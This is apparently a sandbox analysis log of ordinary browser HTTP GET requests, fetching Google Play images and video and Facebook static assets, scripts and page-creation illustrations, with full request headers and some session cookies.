    Source: global trafficHTTP traffic detected: GET /bgcPzHXeNLE4GaoU2M7V0umCe6uxHpBzg8h9TfLUV3tVFjHsjJdL2aGz4cTRk1G5vswo=w648-h364-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yw/r/Jen4pUvOoRZ.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/o2L07-KO0Bj.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/ghLiHO2V3N4.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/ziNkdVTlV4m.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /vp/mp4/1280x720/KHfEG-2pIEI.mp4 HTTP/1.1Host: play-games.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept-Encoding: identity;q=1, *;q=0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoReferer: https://play.google.com/Accept-Language: en-US,en;q=0.9Range: bytes=524288-531734If-Range: Wed, 25 Sep 2024 20:08:08 GMT
    Source: global trafficHTTP traffic detected: GET /8AutM_5u57TFCrU4VHQjobEaJBTsPGhI8Sw6KhP0uCiE3ipk0VgfcBEqB9UcciLtCg=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /security/hsts-pixel.gif HTTP/1.1Host: facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /DEbRrpMmIVFTXH_FH2MezPtEBXhYs2UdwMRK7Q8Mkqdg0tfCikZRnvtZscfYkdbwTvY=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yH/r/xgVgalBG80z.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rzg9wFcos31ri58r-zeMo-2JMQGhoIxiBXY8vmhtoagdE-JG78l5CUSsQ9GNuqwATQE=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/pages/create/biz_illustration.png HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /iFstqoxDElUVv4T3KxkxP3OTcuFvWF5ZQQjT7aIxy4n2uaVigCCykxeG6EZV9FQ10X1itPj1oORm=s20-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /12USW7aflgz466ifDehKTnMoAep_VHxDmKJ6jEBoDZWCSefOC-ThRX14Mqe0r8KF9XCzrpMqJts=s20-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3i_Ou4/yX/l/en_GB/UlpshyJeqkw.js HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.facebook.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lqq4t8D0lUEFIPQGIn9fZIxyulux127eqqYMK1aX58Xn9Kfd6xfXVCSRW72RMorVeyw=w648-h364-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_T2WgYqgPLhE4WBKsH85VwWFzN8tCiVwGRnEvq92u_sjcphUK7vpXETasL_reqU-YA=w526-h296-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ApR4SacgWT7KSe5v_eEOrBvuKwQmeGpkOjfcC1WNINE8bJI7iBgaW00eohkBmJ73QW8=w648-h364-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yw/r/Jen4pUvOoRZ.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rsrc.php/v3/yr/r/ghLiHO2V3N4.png HTTP/1.1Host: static.xx.fbcdn.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/pages/create/community_illustration.png HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.facebook.com/pages/create/?ref_type=registration_formAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /signals/config/1668333663438923?v=2.9.169&r=stable&domain=www.facebook.com&hme=d82868061a8c707cd31395a3055e7449daa03bd520872727258c39e6af34523e&ex_m=70%2C120%2C106%2C110%2C61%2C4%2C99%2C69%2C16%2C96%2C88%2C51%2C54%2C171%2C174%2C186%2C182%2C183%2C185%2C29%2C100%2C53%2C77%2C184%2C166%2C169%2C179%2C180%2C187%2C130%2C41%2C34%2C142%2C15%2C50%2C193%2C192%2C132%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C92%2C17%2C14%2C95%2C91%2C90%2C107%2C52%2C109%2C39%2C108%2C30%2C93%2C26%2C167%2C170%2C139%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C101%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C103%2C102%2C104%2C97%2C10%2C20%2C3%2C38%2C74%2C19%2C85%2C56%2C83%2C33%2C73%2C0%2C94%2C32%2C82%2C87%2C47%2C46%2C86%2C37%2C5%2C89%2C81%2C44%2C35%2C84%2C2%2C36%2C63%2C42%2C105%2C45%2C79%2C68%2C111%2C60%2C59%2C31%2C98%2C58%2C55%2C49%2C78%2C72%2C24%2C112 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.facebook.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/pages/create/biz_illustration.png HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /W5DPtvB8Fhmkn5LbFZki_OHL3ZI1Rdc-AFul19UK4f7np2NMjLE5QquD6H0HAeEJ977u3WH4yaQ=s20-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ohRyQRA9rNfhp7xLW0MtW1soD8SEX45Oec7MyH3FaxtukWUG_6GKVpvh3JiugzryLi7Bia02HPw=s20-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bgcPzHXeNLE4GaoU2M7V0umCe6uxHpBzg8h9TfLUV3tVFjHsjJdL2aGz4cTRk1G5vswo=w648-h364-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /a/ACg8ocKuSzmnDV00ix3atEWYmyGKFuKJcfnKhu7p7TvSSbZ4nTjDyA=s32-rw-mo HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /a/ACg8ocJZ_a0qI7f5pr9REiRB_V4G5VIHM_m0KU83eeL3o5d-9yiNCA=s32-rw-mo HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /a/ACg8ocJvrYwDJyRckGbLvJ-eKJjIJ6qfcK3108LZUcPbTK_gPp_h_Q=s32-rw-mo HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.134"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQiPys0BCLnKzQEI6dLNAQjo1c0BCMvWzQEIqNjNAQj5wNQVGLrSzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://play.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /iFstqoxDElUVv4T3KxkxP3OTcuFvWF5ZQQjT7aIxy4n2uaVigCCykxeG6EZV9FQ10X1itPj1oORm=s20-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/pages/create/community_illustration.png HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fr=0QHepad51NLqNU46q..Bm-N07..AAA.0.0.Bm-N07.AWXuojQA4po; sb=O934ZizfugwK86As5FvnwEDL; wd=1280x907; datr=O934ZvtQ_C-R3ZM0Ae39F-hF
    Source: global trafficHTTP traffic detected: GET /12USW7aflgz466ifDehKTnMoAep_VHxDmKJ6jEBoDZWCSefOC-ThRX14Mqe0r8KF9XCzrpMqJts=s20-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /y1SAU1g399-DZL0-G3-i0CoT2pQQABM5miEa1C3w2--MxFNh26USlCRt1WGTsmvA6H2v=w2560-h1440-rw HTTP/1.1Host: play-lh.googleusercontent.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
